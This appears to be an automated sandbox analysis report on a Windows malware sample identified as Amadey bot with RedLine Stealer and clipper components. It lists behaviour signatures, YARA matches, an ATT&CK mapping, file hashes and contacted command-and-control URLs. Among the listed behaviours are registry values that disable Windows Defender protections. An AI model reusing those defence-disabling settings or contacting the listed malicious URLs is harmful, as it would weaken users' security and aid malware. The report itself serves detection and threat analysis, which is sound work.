Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 11_2_01377AFC cpuid

11_2_01377AFC

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB7176 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00EB7176

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 11_2_01383C76 _free,_free,_free,GetTimeZoneInformation,_free,

11_2_01383C76

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Code function: 6_2_00007FFC9D7D077D GetUserNameA,

6_2_00007FFC9D7D077D

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

0_2_00EB2BFB

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1

Jump to behavior

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 12.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xriv.exe.1360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4a7e820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.xriv.exe.1360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.4a7e820.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.mnolyk.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000000.478665181.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.315712522.0000000001361000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.774886747.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.332316282.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.735906035.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.329538528.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.736447784.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.607631806.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.318625454.0000000001361000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.607288773.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.352687909.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.479520127.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.352170413.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.318048617.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.775069911.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.775069911.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 22.2.rundll32.exe.6d0c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 Windows Service	2 Bypass User Access Control	21 Disable or Modify Tools	1 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	14 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Windows Service	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Service Execution	1 Services File Permissions Weakness	111 Process Injection	2 Software Packing	NTDS	36 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	1 Registry Run Keys / Startup Folder	2 Bypass User Access Control	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	1 Services File Permissions Weakness	1 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	21 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Access Token Manipulation	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	111 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Services File Permissions Weakness	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	1 Rundll32	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	67%	ReversingLabs	Win32.Trojan.Amadey
file.exe	49%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll	81%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	81%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	54%	ReversingLabs	Win32.Trojan.Tedy
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	81%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	47%	ReversingLabs	Win32.Ransomware.Stop
C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.Disabler
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	81%	ReversingLabs	Win32.Trojan.Amadey

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll	0%	Avira URL Cloud	safe
62.204.41.4/Gol478Ns/index.php	12%	Virustotal		Browse
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll	2%	Virustotal		Browse
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	17%	Virustotal		Browse
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	100%	Avira URL Cloud	malware
http://62.204.41.4/Gol478Ns/index.php	100%	Avira URL Cloud	malware
62.204.41.4/Gol478Ns/index.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
62.204.41.4/Gol478Ns/index.php	true	12%, Virustotal, Browse Avira URL Cloud: malware	low
http://62.204.41.4/Gol478Ns/index.php	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
62.204.41.4	unknown	United Kingdom		30798	TNNET-ASTNNetOyMainnetworkFI	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	800799
Start date and time:	2023-02-07 19:59:16 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@38/14@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 46.9% (good quality ratio 44.9%) Quality average: 84.9% Quality standard deviation: 24.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 96 Number of non-executed functions: 139
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:00:47	API Interceptor	2477x Sleep call for process: mnolyk.exe modified
20:00:50	Task Scheduler	Run new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
62.204.41.4	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php
	file.exe	Get hash	malicious	Browse	62.204.41.4/Gol478Ns/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TNNET-ASTNNetOyMainnetworkFI	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.134
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	Rg7BWLbTVs.exe	Get hash	malicious	Browse	62.204.41.134
	y7bGEK2e4Y.exe	Get hash	malicious	Browse	62.204.41.5
	MZtij6SN87.exe	Get hash	malicious	Browse	62.204.41.5
	9sJ5F2RAvY.exe	Get hash	malicious	Browse	62.204.41.5
	xakJ7het39.exe	Get hash	malicious	Browse	62.204.41.134
	ePaQLI5RyP.exe	Get hash	malicious	Browse	62.204.41.7
	z3tYlqYItl.exe	Get hash	malicious	Browse	62.204.41.7
	jGQGty5EA2.exe	Get hash	malicious	Browse	62.204.41.7
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4
	file.exe	Get hash	malicious	Browse	62.204.41.4

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nika.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.354940450065058
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:	B10E37251C5B495643F331DB2EEC3394
SHA1:	25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:	8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:	296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\afCf.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.355221377978991
Encrypted:	false
SSDEEP:	6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
MD5:	03C5BA5FCE7124B503EA65EF522177C3
SHA1:	F76B1F538D5EA66664355901E927B2F870ACCDD8
SHA-256:	8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
SHA-512:	151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.3469756750979025
Encrypted:	false
SSDEEP:	1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
MD5:	C79B74D8FEC5E7E2BA2F1789FD582A15
SHA1:	78A1E5D99DBACCC5E07B125E1DFB280112CB3128
SHA-256:	B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
SHA-512:	0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	241664
Entropy (8bit):	6.368190069123744
Encrypted:	false
SSDEEP:	6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
MD5:	8BB923C4D81284DAEF7896E5682DF6C6
SHA1:	67E34A96B77E44B666C5479F540995BDEACF5DE2
SHA-256:	9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
SHA-512:	2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#....#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	346112
Entropy (8bit):	7.640932751534781
Encrypted:	false
SSDEEP:	6144:K2y+bnr+Sp0yN90QEhNngiBIdDYf6EeYHPmSNjzAwtRS:KMriy90VRBIdhYzVtY
MD5:	DAE3685D13248C42313D46F76E2EC968
SHA1:	3547935A2D717DBFA69E9718F62A68ADDF58FFC8
SHA-256:	13A8DA35A2F966FAC5A6A327FA92A963EA287878E63C5416BA4F49BF80EE4D8B
SHA-512:	D77969AD3D60707C6870A0E14DC7DB9D7CB2624BBBC7448BF137E04B13232C28B1C796266CB8466D1F5C3FA720A006C884C13937E72C566A5074966E2AC0E566
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 54%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.......................................@...... ......................................@...............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	241664
Entropy (8bit):	6.368190069123744
Encrypted:	false
SSDEEP:	6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
MD5:	8BB923C4D81284DAEF7896E5682DF6C6
SHA1:	67E34A96B77E44B666C5479F540995BDEACF5DE2
SHA-256:	9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
SHA-512:	2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#....#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	251392
Entropy (8bit):	7.321238876486759
Encrypted:	false
SSDEEP:	3072:SJsOlmNl8dK08LQXi3Wh59aFBIaYLDgoA702gTutxYfTPJgWoVbXTbw3Ga44:SJs/ud/8Lf3jBITDYMStefrJgr9b64
MD5:	6E870598039CCE621C7BB265AC99BB3F
SHA1:	708EACDFEC2DED675D36C1EB3EA628797A366E10
